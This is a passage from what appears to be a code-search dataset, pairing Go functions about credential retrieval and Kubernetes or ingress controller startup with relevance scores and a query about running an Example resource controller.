json.Unmarshal(resp.Data, &chromeData); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn chromeData.Result.Credentials, nil\n}", "func Credentials() (string, string) {\n\tqs := []*survey.Question{\n\t\t{\n\t\t\tName: \"username\",\n\t\t\tPrompt: &survey.Input{Message: \"What is your username?\"},\n\t\t\tValidate: survey.Required,\n\t\t},\n\t\t{\n\t\t\tName: \"password\",\n\t\t\tPrompt: &survey.Password{Message: \"Please enter your password.\"},\n\t\t\tValidate: survey.Required,\n\t\t},\n\t}\n\n\tanswers := struct {\n\t\tUsername string\n\t\tPassword string\n\t}{}\n\n\terr := survey.Ask(qs, &answers)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treturn answers.Username, answers.Password\n}", "func (c *ClusterClient) Credentials() *CredentialsClient {\n\treturn NewCredentialsClient(\n\t\tc.transport,\n\t\tpath.Join(c.path, \"credentials\"),\n\t)\n}", "func (ctrler CtrlDefReactor) GetCredentialsWatchOptions() *api.ListWatchOptions {\n\tlog.Info(\"GetCredentialsWatchOptions is not implemented\")\n\topts := &api.ListWatchOptions{}\n\treturn opts\n}", "func ClientCredentials() *credentials.TransportCredentials {\n\treturn clientCredentials\n}", "func (sh *Shell) ForkCredentials(extensions ...string) *Credentials {\n\treturn sh.ForkCredentialsFromPrincipal(v23.GetPrincipal(sh.Ctx), extensions...)\n}", "func (m *Application) GetPasswordCredentials()([]PasswordCredentialable) {\n return m.passwordCredentials\n}", "func Get(helper Helper, reader io.Reader, writer io.Writer) error {\n\tscanner := bufio.NewScanner(reader)\n\n\tbuffer := new(bytes.Buffer)\n\tfor scanner.Scan() {\n\t\tbuffer.Write(scanner.Bytes())\n\t}\n\n\tif err := scanner.Err(); err != nil && err != io.EOF {\n\t\treturn err\n\t}\n\n\tserverURL := strings.TrimSpace(buffer.String())\n\tif len(serverURL) == 0 {\n\t\treturn NewErrCredentialsMissingServerURL()\n\t}\n\n\tusername, secret, err := helper.Get(serverURL)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbuffer.Reset()\n\terr = json.NewEncoder(buffer).Encode(Credentials{\n\t\tServerURL: serverURL,\n\t\tUsername: username,\n\t\tSecret: secret,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, _ = fmt.Fprint(writer, buffer.String())\n\treturn nil\n}", "func (r *Request) BasicAuthCredentials() (string, string, bool) {\n\treturn r.BasicAuth()\n}", "func (p *TempCredentialsProvider) getCredsWithRole() (credentials.Value, error) {\n\tlog.Println(\"Getting credentials with AssumeRole\")\n\n\tif p.config.RoleARN == \"\" {\n\t\treturn credentials.Value{}, errors.New(\"No role defined\")\n\t}\n\n\trole, err := p.assumeRoleFromCreds(p.masterCreds, true)\n\tif err != nil {\n\t\treturn credentials.Value{}, err\n\t}\n\n\tp.SetExpiration(*role.Expiration, DefaultExpirationWindow)\n\n\tlog.Printf(\"Using role %s, expires in %s\", formatKeyForDisplay(*role.AccessKeyId), time.Until(*role.Expiration).String())\n\treturn credentials.Value{\n\t\tAccessKeyID: *role.AccessKeyId,\n\t\tSecretAccessKey: *role.SecretAccessKey,\n\t\tSessionToken: *role.SessionToken,\n\t}, nil\n}", "func getCredentials(env storageEnvironment) (map[string]string, error) {\n\tcredentials := map[string]string{}\n\tswitch env {\n\tcase emulator:\n\t\treturn map[string]string{\n\t\t\t\"AZURE_STORAGE_ACCOUNT_NAME\": storage.StorageEmulatorAccountName,\n\t\t\t\"AZURE_STORAGE_ACCOUNT_KEY\": storage.StorageEmulatorAccountKey}, nil\n\tcase account:\n\t\tcredentials = map[string]string{\n\t\t\t\"AZURE_STORAGE_ACCOUNT_NAME\": os.Getenv(\"AZURE_STORAGE_ACCOUNT_NAME\"),\n\t\t\t\"AZURE_STORAGE_ACCOUNT_KEY\": os.Getenv(\"AZURE_STORAGE_ACCOUNT_KEY\")}\n\t\tif err := checkEnvVar(&credentials); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn credentials, nil\n}", "func (RequestAuthenticationToken *TRequestAuthenticationToken) GetCredential() string {\n\treturn \"\"\n}", "func (db DatabaseConfig) Credentials() string {\n\t// TODO Different credentials for different drivers\n\treturn fmt.Sprintf(\n\t\t\"host=%s port=%d dbname=%s user=%s password=%s\",\n\t\tdb.Host,\n\t\tdb.Port,\n\t\tdb.Name,\n\t\tdb.User,\n\t\tdb.Password,\n\t)\n}", "func (s *Synthetics) GetSecureCredentials() ([]*SecureCredential, error) {\n\treturn s.GetSecureCredentialsWithContext(context.Background())\n}", "func (p DirectHandler) getCredentials(w http.ResponseWriter, r *http.Request) (credentials, error) {\n\n\t// GET /something?user=name&passwd=xyz&aud=bar\n\tif r.Method == \"GET\" {\n\t\treturn credentials{\n\t\t\tUser: r.URL.Query().Get(\"user\"),\n\t\t\tPassword: r.URL.Query().Get(\"passwd\"),\n\t\t\tAudience: r.URL.Query().Get(\"aud\"),\n\t\t}, nil\n\t}\n\n\tif r.Method != \"POST\" {\n\t\treturn credentials{}, fmt.Errorf(\"method %s not supported\", r.Method)\n\t}\n\n\tif r.Body != nil {\n\t\tr.Body = http.MaxBytesReader(w, r.Body, MaxHTTPBodySize)\n\t}\n\tcontentType := r.Header.Get(\"Content-Type\")\n\tif contentType != \"\" {\n\t\tmt, _, err := mime.ParseMediaType(r.Header.Get(\"Content-Type\"))\n\t\tif err != nil {\n\t\t\treturn credentials{}, err\n\t\t}\n\t\tcontentType = mt\n\t}\n\n\t// POST with json body\n\tif contentType == \"application/json\" {\n\t\tvar creds credentials\n\t\tif err := json.NewDecoder(r.Body).Decode(&creds); err != nil {\n\t\t\treturn credentials{}, fmt.Errorf(\"failed to parse request body: %w\", err)\n\t\t}\n\t\treturn creds, nil\n\t}\n\n\t// POST with form\n\tif err := r.ParseForm(); err != nil {\n\t\treturn credentials{}, fmt.Errorf(\"failed to parse request: %w\", err)\n\t}\n\n\treturn credentials{\n\t\tUser: r.Form.Get(\"user\"),\n\t\tPassword: r.Form.Get(\"passwd\"),\n\t\tAudience: r.Form.Get(\"aud\"),\n\t}, nil\n}", "func (b *Base) GetDefaultCredentials() *Credentials {\n\tb.API.credMu.RLock()\n\tdefer b.API.credMu.RUnlock()\n\tif b.API.credentials == nil {\n\t\treturn nil\n\t}\n\tcreds := *b.API.credentials\n\treturn &creds\n}", "func TransportCredentials() *credentials.TransportCredentials {\n\treturn transportCredentials\n}", "func New() *Credentials {\n\tc := Credentials{}\n\tc.whitelist = make(map[string]struct{}, 1)\n\treturn &c\n}", "func (a *Client) GetClusterCredentials(params *GetClusterCredentialsParams, authInfo runtime.ClientAuthInfoWriter) (*GetClusterCredentialsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewGetClusterCredentialsParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"GetClusterCredentials\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/api/v1/clusters/{name}/credentials\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &GetClusterCredentialsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.(*GetClusterCredentialsOK), nil\n\n}", "func credentials() (username string, password string) {\n\treader := bufio.NewReader(os.Stdin)\n\n\tif asUser != \"\" {\n\t\tusername = asUser\n\t} else {\n\t\tif currentUser, err := user.Current(); err == nil {\n\t\t\tif testPassword {\n\t\t\t\tusername = \"test1\"\n\t\t\t} else {\n\t\t\t\tusername = currentUser.Username\n\t\t\t\tlog.Info(\"Current username: \" + username)\n\t\t\t}\n\t\t} else {\n\t\t\tfmt.Print(\"Enter Username: \")\n\t\t\tusername, _ = reader.ReadString('\\n')\n\t\t}\n\t}\n\tlog.Info(\"Connecting with username: \" + username)\n\n\tif testPassword {\n\t\tpassword = \"password\"\n\t} else {\n\t\tif withPassword != \"\" {\n\t\t\tpassword = withPassword\n\t\t} else if passwdFromEnv {\n\t\t\tpassword = os.Getenv(\"$VAULT_SSH_PWD\")\n\t\t} else {\n\t\t\tfmt.Print(\"Enter Password: \")\n\t\t\tbytePassword, err := terminal.ReadPassword(int(syscall.Stdin))\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Failed to read password\")\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\t\t\tfmt.Println()\n\t\t\tpassword = string(bytePassword)\n\t\t}\n\t}\n\n\treturn strings.TrimSpace(username), strings.TrimSpace(password)\n}", "func (p *AssumeRoleProvider) Retrieve(ctx context.Context) (aws.Credentials, error) {\n\trole, err := p.RetrieveStsCredentials(ctx)\n\tif err != nil {\n\t\treturn aws.Credentials{}, err\n\t}\n\n\treturn aws.Credentials{\n\t\tAccessKeyID: *role.AccessKeyId,\n\t\tSecretAccessKey: *role.SecretAccessKey,\n\t\tSessionToken: *role.SessionToken,\n\t\tCanExpire: true,\n\t\tExpires: *role.Expiration,\n\t}, nil\n}", "func (m *Application) GetKeyCredentials()([]KeyCredentialable) {\n return m.keyCredentials\n}", "func AccessCredentials(token string) credentials.PerRPCCredentials {\n\treturn creds{payload: token, security: access}\n}", "func (ec *ExtensionClient) ListCredentials(extensionID, serviceID string) (res []*extension.ExtensionCredentials, err error) {\n\trequest, err := extensionc.BuildListCredentialsPayload(extensionID, serviceID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse, err := ec.c.ListCredentials()(context.Background(), request)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn response.([]*extension.ExtensionCredentials), nil\n}", "func getCreds() (string, string) {\n\tvar username string\n\tfmt.Print(\"Username: \")\n\tfmt.Scanln(&username)\n\tfmt.Print(\"Password: \")\n\tpassword, err := terminal.ReadPassword(int(syscall.Stdin))\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tfmt.Println(\"\")\n\treturn username, string(password)\n}", "func (c *stsCredentialsCache) getStsCredentials(accessor Accessor) (*credentials.Credentials, error) {\n\tif !c.expired() && c.credentials != nil {\n\t\treturn c.credentials, nil\n\t}\n\n\tperRPCCreds, err := accessor.Credentials()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient, err := newConn(accessor.IdentityProvider(), config.Env.Token, perRPCCreds)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer client.Close()\n\n\tbundle, err := client.refreshStsCredentials()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tstsToken := bundle.GetStsToken()\n\n\tawsCredentials := credentials.NewStaticCredentialsFromCreds(credentials.Value{\n\t\tAccessKeyID: stsToken.AccessKeyId,\n\t\tSecretAccessKey: stsToken.SecretAccessKey,\n\t\tSessionToken: stsToken.SessionToken,\n\t})\n\n\tc.add(stsToken.GetExpiration(), awsCredentials)\n\n\treturn awsCredentials, nil\n}", "func (m *MockCredentialGetter) GetCredentials(arg0 context.Context, arg1, arg2 string) ([]byte, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"GetCredentials\", arg0, arg1, arg2)\n\tret0, _ := ret[0].([]byte)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (config *Config) GetHttpCredentials() (string, string) {\n\tparts := strings.Split(config.HttpCredentials, \":\")\n\tif len(parts) < 2 {\n\t\treturn \"\", \"\"\n\t}\n\t// return everything from the first match and the rest\n\treturn parts[0], config.HttpCredentials[len(parts[0])+1:]\n}", "func CredentialsForSecret(secretName string, secretNamespace string, clientset kubernetes.Interface) (user string, password string, err error) {\n\tif secretName == \"\" {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, nil\n\t}\n\t// Try to get secret\n\tsecret, err := clientset.CoreV1().Secrets(secretNamespace).Get(secretName, metav1.GetOptions{})\n\tif err != nil {\n\t\tklog.Errorf(\"Could not get secret, error is %s\\n\", err)\n\t\treturn DefaultRPCUser, DefaultRPCPassword, err\n\t}\n\tdata, ok := secret.Data[UserKey]\n\tif !ok {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, fmt.Errorf(\"Secret does not contain key %s\", UserKey)\n\t}\n\tuser = string(data)\n\tdata, ok = secret.Data[PasswordKey]\n\tpassword = string(data)\n\tif !ok {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, fmt.Errorf(\"Secret does not contain key %s\", PasswordKey)\n\t}\n\treturn user, password, nil\n}", "func (om *Sdk) GetDirectorCredentials(credential string) (*SimpleCredential, error) {\n\treturn om.getCredential(fmt.Sprintf(\"api/v0/deployed/director/credentials/%s\", credential))\n}", "func (source *AWSSecretsManagerSource) Credentials() ([]Credentials, error) {\n\tclient := source.getClient()\n\n\tsecretIDs := []string{}\n\n\tif source.SecretPrefix != \"\" {\n\t\tif err := client.ListSecretsPages(&secretsmanager.ListSecretsInput{}, func(output *secretsmanager.ListSecretsOutput, lastPage bool) bool {\n\t\t\tfor _, secret := range output.SecretList {\n\t\t\t\tif strings.HasPrefix(*secret.Name, source.SecretPrefix) {\n\t\t\t\t\tsecretIDs = append(secretIDs, *secret.ARN)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn !lastPage\n\t\t}); err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Error listing secrets: %v\", err)\n\t\t}\n\n\t\tif len(secretIDs) == 0 {\n\t\t\treturn nil, fmt.Errorf(\"No secrets found with the '%s' prefix\", source.SecretPrefix)\n\t\t}\n\t} else if source.SecretID != \"\" {\n\t\tsecretIDs = append(secretIDs, source.SecretID)\n\t}\n\n\tcredentials := []Credentials{}\n\tfor _, secretID := range secretIDs {\n\t\tvalue, err := client.GetSecretValue(&secretsmanager.GetSecretValueInput{\n\t\t\tSecretId: aws.String(secretID),\n\t\t})\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Error while fetching secret %s: %v\", secretID, err)\n\t\t}\n\t\tfetchedCredentials, err := getCredentialsFromBytes([]byte(*value.SecretString))\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Error while parsing credentials from secret %s: %v\", secretID, err)\n\t\t}\n\t\tcredentials = append(credentials, fetchedCredentials...)\n\t}\n\n\treturn credentials, nil\n}", "func (svc *credentialService) Get(ctx context.Context, email string) (model.Credential, error) {\n\tcred, err := svc.repo.Get(ctx, email)\n\tif err == repo.ErrNotFound {\n\t\t//user not found, cannot login\n\t\treturn cred, service.ErrNotFound\n\t}\n\n\treturn cred, err\n}", "func (p *clientCredentialsSource) ClientCredentials() (*ClientCredentials, error) {\n\tid, err := readFileContent(path.Join(p.path, fmt.Sprintf(\"%s-client-id\", p.name)))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsecret, err := readFileContent(path.Join(p.path, fmt.Sprintf(\"%s-client-secret\", p.name)))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &ClientCredentials{\n\t\tID: id,\n\t\tSecret: secret,\n\t}, nil\n}", "func NewCredentials(service string) tushle.Credentials {\n\treturn &creds{\n\t\tservice: service,\n\t}\n}", "func (store *CredStore) GetCred(path string) []byte {\n\treturn store.Cred[path]\n}", "func getDefaultCredentials() *credentials.Credentials {\n\tfileCreds := credentials.FromFile()\n\tif fileCreds != nil {\n\t\treturn fileCreds\n\t}\n\n\tenvCreds := credentials.FromEnv()\n\tif envCreds != nil {\n\t\treturn envCreds\n\t}\n\treturn &credentials.Credentials{}\n}", "func getAWSCredentials(keychainName string, keychainProfile string) (*credentials.Credentials, error) {\n\n\t// Open the keyring which holds the credentials\n\tring, _ := keyring.Open(keyring.Config{\n\t\tServiceName: \"aws-vault\",\n\t\tAllowedBackends: []keyring.BackendType{keyring.KeychainBackend},\n\t\tKeychainName: keychainName,\n\t\tKeychainTrustApplication: true,\n\t})\n\n\t// Prepare options for the vault before creating the provider\n\tvConfig, err := vault.LoadConfigFromEnv()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to load AWS config from environment\")\n\t}\n\tvOptions := vault.VaultOptions{\n\t\tConfig: vConfig,\n\t\tMfaPrompt: prompt.Method(\"terminal\"),\n\t}\n\tvOptions = vOptions.ApplyDefaults()\n\terr = vOptions.Validate()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to validate aws-vault options\")\n\t}\n\n\t// Get a new provider to retrieve the credentials\n\tprovider, err := vault.NewVaultProvider(ring, keychainProfile, vOptions)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to create aws-vault provider\")\n\t}\n\tcredVals, err := provider.Retrieve()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to retrieve aws credentials from aws-vault\")\n\t}\n\treturn credentials.NewStaticCredentialsFromCreds(credVals), nil\n}", "func (settings EnvironmentSettings) GetClientCredentials() (ClientCredentialsConfig, error) {\n\tsecret := settings.Values[ClientSecret]\n\tif secret == \"\" {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetClientCredentials() missing client secret\")\n\t\treturn ClientCredentialsConfig{}, errors.New(\"missing client secret\")\n\t}\n\tclientID, tenantID := settings.getClientAndTenant()\n\tconfig := NewClientCredentialsConfig(clientID, secret, tenantID)\n\tconfig.AADEndpoint = settings.Environment.ActiveDirectoryEndpoint\n\tconfig.Resource = settings.Values[Resource]\n\tif auxTenants, ok := settings.Values[AuxiliaryTenantIDs]; ok {\n\t\tconfig.AuxTenants = strings.Split(auxTenants, \";\")\n\t\tfor i := range config.AuxTenants {\n\t\t\tconfig.AuxTenants[i] = strings.TrimSpace(config.AuxTenants[i])\n\t\t}\n\t}\n\treturn config, nil\n}", "func (m *MockKubernetesService) GetCredentials(clusterID string) (*do.KubernetesClusterCredentials, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"GetCredentials\", clusterID)\n\tret0, _ := ret[0].(*do.KubernetesClusterCredentials)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func cCredentials(u UserCredentials) UserCredentials {\n\treturn UserCredentials{Email: u.Email, Password: u.Password}\n}", "func NewCredentials(build build.Build) Credentials {\n\treturn Credentials{build.Buildpack, build.Layers.HelperLayer(\"google-stackdriver-credentials\", \"Google Stackdriver Credentials\")}\n}", "func (c *ClientCredsCache) Get(region string) (*types.ClientCreds, error) {\n\tkey := getClientCredsFilename(region)\n\tcacheFile := filepath.Join(defaultCacheLocation(), key)\n\n\tvar clientCreds *types.ClientCreds\n\n\tif _, err := os.Stat(cacheFile); os.IsNotExist(err) {\n\t\treturn &types.ClientCreds{}, err\n\t}\n\n\tdata, err := ioutil.ReadFile(cacheFile)\n\tif err != nil {\n\t\treturn &types.ClientCreds{}, err\n\t}\n\n\terr = json.Unmarshal(data, &clientCreds)\n\tif err != nil {\n\t\treturn &types.ClientCreds{}, err\n\t}\n\n\treturn clientCreds, nil\n}", "func (p *SessionTokenProvider) Retrieve(ctx context.Context) (aws.Credentials, error) {\n\tvar err error\n\tcreds := p.CheckCache()\n\n\tif creds == nil || creds.Value().Expired() {\n\t\tp.Logger.Debugf(\"Detected expired or unset session token credentials, refreshing\")\n\t\tcreds, err = p.retrieve(ctx)\n\t\tif err != nil {\n\t\t\treturn aws.Credentials{}, err\n\t\t}\n\n\t\tif p.Cache != nil {\n\t\t\tif err = p.Cache.Store(creds); err != nil {\n\t\t\t\tp.Logger.Debugf(\"error caching credentials: %v\", err)\n\t\t\t}\n\t\t}\n\t}\n\n\t// afaik, this can never happen\n\t// if creds == nil {\n\t//\t// something's wacky, expire existing provider creds, and retry\n\t//\tp.SetExpiration(time.Unix(0, 0), 0)\n\t//\treturn p.Retrieve()\n\t// }\n\n\tv := creds.Value()\n\tv.Source = SessionTokenProviderName\n\n\tp.Logger.Debugf(\"SESSION TOKEN CREDENTIALS: %+v\", v)\n\treturn v, nil\n}" ]
[ "0.82303035", "0.7841024", "0.76808125", "0.7602995", "0.75996184", "0.74585074", "0.7434118", "0.73599946", "0.7357788", "0.73341274", "0.7289662", "0.7288641", "0.7255966", "0.7176546", "0.7145936", "0.7091499", "0.70872587", "0.70598394", "0.7058662", "0.70557296", "0.70268774", "0.6969246", "0.6849835", "0.68385136", "0.6822007", "0.6742293", "0.6703539", "0.6676863", "0.6656979", "0.66251415", "0.6605071", "0.6601595", "0.65370387", "0.6479912", "0.6441515", "0.64356834", "0.6430601", "0.6421962", "0.641556", "0.64140064", "0.63669", "0.63636863", "0.6359626", "0.63587946", "0.6357037", "0.634635", "0.6315644", "0.62814224", "0.62793773", "0.6275255", "0.62692034", "0.6266259", "0.6253308", "0.6248926", "0.6194891", "0.61403155", "0.6123759", "0.6120761", "0.61135185", "0.6112402", "0.61076254", "0.60991037", "0.60922235", "0.60829943", "0.60610837", "0.60527396", "0.60465115", "0.6038053", "0.6023137", "0.60055286", "0.5985859", "0.59854734", "0.59758294", "0.59631056", "0.5962777", "0.59526324", "0.5952311", "0.5943641", "0.5939044", "0.5939014", "0.59283227", "0.5923012", "0.59118134", "0.5905458", "0.5889592", "0.58754003", "0.5865126", "0.5860499", "0.58575946", "0.5846276", "0.5836653", "0.5832468", "0.58174723", "0.58057815", "0.58022565", "0.5797256", "0.5795788", "0.5794192", "0.5792897", "0.5783627", "0.57802725" ]
0.0
-1
Run starts an Example resource controller
func (c *FunctionController) Run(ctx context.Context) error { fmt.Print("Watch Example objects\n") // Watch Example objects _, err := c.watchFunctions(ctx) if err != nil { fmt.Printf("Failed to register watch for Example resource: %v\n", err) return err } <-ctx.Done() return ctx.Err() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func main() {\n\tclientset, err := NewClientSet()\n\tif err != nil {\n\t\tlog.Fatalf(\"clientset failed to load: %v\", err)\n\t}\n\n\tc := NewController(clientset)\n\n\tstop := make(chan struct{})\n\tdefer close(stop)\n\n\tif err = c.Run(1, stop); err != nil {\n\t\tlog.Fatalf(\"Error running controller: %s\", err.Error())\n\t}\n}", "func (c *Controller) Run(ctx context.Context) error {\n\t// Start the informer factories to begin populating the informer caches\n\tc.log.Infof(\"starting step control loop, node name: %s\", c.nodeName)\n\n\t// 初始化runner\n\tc.log.Info(\"init controller engine\")\n\tif err := engine.Init(c.wc, c.informer.Recorder()); err != nil {\n\t\treturn err\n\t}\n\n\tif err := c.sync(ctx); err != nil {\n\t\treturn err\n\t}\n\n\tc.waitDown(ctx)\n\treturn nil\n}", "func RunController(host string) {\n\tr := mux.NewRouter()\n\n\t// album handler\n\tr.HandleFunc(\"/api/v1/albums\", albumPostHandler).Methods(\"POST\")\n\tr.HandleFunc(\"/api/v1/albums/{albumID}\", albumDeleteHandler).Methods(\"DELETE\")\n\tr.HandleFunc(\"/api/v1/albums\", albumGetHandler).Methods(\"GET\")\n\n\t// image handler\n\tr.HandleFunc(\"/api/v1/albums/{albumID}/images\", imagePostHandler).Methods(\"POST\")\n\tr.HandleFunc(\"/api/v1/albums/{albumID}/images/{imageID}\", imageDeleteHandler).Methods(\"DELETE\")\n\tr.HandleFunc(\"/api/v1/albums/{albumID}/images\", imageGetHandler).Methods(\"GET\")\n\n\tr.HandleFunc(\"/swagger\", swaggerHandler)\n\n\tfs := http.FileServer(http.Dir(\"./swaggerui\"))\n\tr.PathPrefix(\"/swaggerui/\").Handler(http.StripPrefix(\"/swaggerui/\", fs))\n\n\tr.PathPrefix(\"/data/\").Handler(http.StripPrefix(\"/data/\", http.FileServer(http.Dir(\"/data/\"))))\n\n\tlog.Println(\"starting server at \", host)\n\terr := http.ListenAndServe(host, r)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n}", "func Run(conf *config.Config) {\n\n\tvar eventHandler = ParseEventHandler(conf)\n\tcontroller.Start(conf, eventHandler)\n}", "func Run(addr string) error {\n\te := echo.New()\n\n\te.HideBanner = true\n\n\te.Use(middleware.RequestID())\n\te.Use(middleware.Recover())\n\te.Use(middleware.Logger())\n\n\te.GET(\"/v3/api-docs\", GetSpec)\n\te.GET(\"/swagger-ui\", echo.WrapHandler(http.RedirectHandler(\"/swagger-ui/\", http.StatusMovedPermanently)))\n\te.GET(\"/swagger-ui/*\", echo.WrapHandler(third_party.SwaggerUIHandler(e)))\n\n\tp := prometheus.NewPrometheus(\"echo\", nil)\n\tp.Use(e)\n\n\tsvr := &server{}\n\tapi.RegisterHandlers(e, svr)\n\n\treturn e.Start(addr)\n}", "func (c *SeederController) Run(ctx context.Context) error {\n\tglog.Info(\"Running OpenstackSeeder controller\")\n\n\t// Watch OpenstackSeed objects\n\t_, err := c.watchOpenstackSeeds(ctx)\n\tif err != nil {\n\t\tglog.Errorf(\"Failed to register watcher for OpenstackSeed resource: %v\", err)\n\t\treturn err\n\t}\n\n\t<-ctx.Done()\n\treturn ctx.Err()\n}", "func Run(){\n\tRestApiImplPtr.RegisterApi()\n\tRestServerImplPtr.StartRestServer();\n}", "func Run(ctx context.Context, c *config.Config) error {\n\tdeprecatedLogger, err := util.MakeLogger(c.LogLevel, c.LogFormat)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to make logger: %w\", err)\n\t}\n\tvar logger logr.Logger = logrusr.NewLogger(deprecatedLogger)\n\n\tctrl.SetLogger(logger)\n\tsetupLog := ctrl.Log.WithName(\"setup\")\n\tsetupLog.Info(\"starting controller manager\", \"release\", Release, \"repo\", Repo, \"commit\", Commit)\n\n\tkubeconfig, err := c.GetKubeconfig()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"get kubeconfig from file %q: %w\", c.KubeconfigPath, err)\n\t}\n\n\t// set \"kubernetes.io/ingress.class\" to be used by controllers (defaults to \"kong\")\n\tsetupLog.Info(`the ingress class name has been set`, \"value\", c.IngressClassName)\n\n\tscheme := runtime.NewScheme()\n\tutilruntime.Must(clientgoscheme.AddToScheme(scheme))\n\tutilruntime.Must(konghqcomv1.AddToScheme(scheme))\n\tutilruntime.Must(configurationv1alpha1.AddToScheme(scheme))\n\tutilruntime.Must(configurationv1beta1.AddToScheme(scheme))\n\n\tcontrollerOpts := ctrl.Options{\n\t\tScheme: scheme,\n\t\tMetricsBindAddress: c.MetricsAddr,\n\t\tPort: 9443,\n\t\tHealthProbeBindAddress: c.ProbeAddr,\n\t\tLeaderElection: c.EnableLeaderElection,\n\t\tLeaderElectionID: c.LeaderElectionID,\n\t}\n\n\t// determine how to configure namespace watchers\n\tif strings.Contains(c.WatchNamespace, \",\") {\n\t\tsetupLog.Info(\"manager set up with multiple namespaces\", \"namespaces\", c.WatchNamespace)\n\t\t// this mode does not set the Namespace option, so the manager will default to watching all namespaces\n\t\t// MultiNamespacedCacheBuilder imposes a filter on top of that watch to retrieve scoped resources\n\t\t// from the watched namespaces only.\n\t\tcontrollerOpts.NewCache = cache.MultiNamespacedCacheBuilder(strings.Split(c.WatchNamespace, \",\"))\n\t} else {\n\t\tcontrollerOpts.Namespace = c.WatchNamespace\n\t}\n\n\t// build the controller manager\n\tmgr, err := ctrl.NewManager(kubeconfig, controllerOpts)\n\tif err != nil {\n\t\tsetupLog.Error(err, \"unable to start manager\")\n\t\treturn err\n\t}\n\n\tkongClient, err := c.GetKongClient(ctx)\n\tif err != nil {\n\t\tsetupLog.Error(err, \"cannot create a Kong Admin API client\")\n\t\treturn err\n\t}\n\n\t// configure the kong client\n\tkongConfig := sendconfig.Kong{\n\t\tURL: c.KongAdminURL,\n\t\tFilterTags: c.FilterTags,\n\t\tConcurrency: c.Concurrency,\n\t\tClient: kongClient,\n\t\tPluginSchemaStore: util.NewPluginSchemaStore(kongClient),\n\t}\n\n\t// determine the proxy synchronization strategy\n\tsyncTickDuration, err := time.ParseDuration(fmt.Sprintf(\"%gs\", c.ProxySyncSeconds))\n\tif err != nil {\n\t\tsetupLog.Error(err, \"%s is not a valid number of seconds to stagger the proxy server synchronization\")\n\t\treturn err\n\t}\n\n\t// start the proxy cache server\n\tprx, err := proxy.NewCacheBasedProxyWithStagger(ctx,\n\t\t// NOTE: logr-based loggers use the \"logger\" field instead of \"subsystem\". When replacing logrus with logr, replace\n\t\t// WithField(\"subsystem\", ...) with WithName(...).\n\t\tdeprecatedLogger.WithField(\"subsystem\", \"proxy-cache-resolver\"),\n\t\tmgr.GetClient(),\n\t\tkongConfig,\n\t\tc.IngressClassName,\n\t\tc.EnableReverseSync,\n\t\tsyncTickDuration,\n\t\tsendconfig.UpdateKongAdminSimple,\n\t)\n\tif err != nil {\n\t\tsetupLog.Error(err, \"unable to start proxy cache server\")\n\t\treturn err\n\t}\n\n\tcontrollers := []ControllerDef{\n\t\t// ---------------------------------------------------------------------------\n\t\t// Core API Controllers\n\t\t// ---------------------------------------------------------------------------\n\n\t\t{\n\t\t\tIsEnabled: &c.ServiceEnabled,\n\t\t\tController: &configuration.CoreV1ServiceReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"Service\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tIsEnabled: &c.ServiceEnabled,\n\t\t\tController: &configuration.CoreV1EndpointsReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: ctrl.Log.WithName(\"controllers\").WithName(\"Endpoints\"),\n\t\t\t\tScheme: mgr.GetScheme(),\n\t\t\t\tProxy: prx,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tIsEnabled: &c.IngressNetV1Enabled,\n\t\t\tController: &configuration.NetV1IngressReconciler{\n\t\t\t\tClient: mgr.GetClient(),\n\t\t\t\tLog: 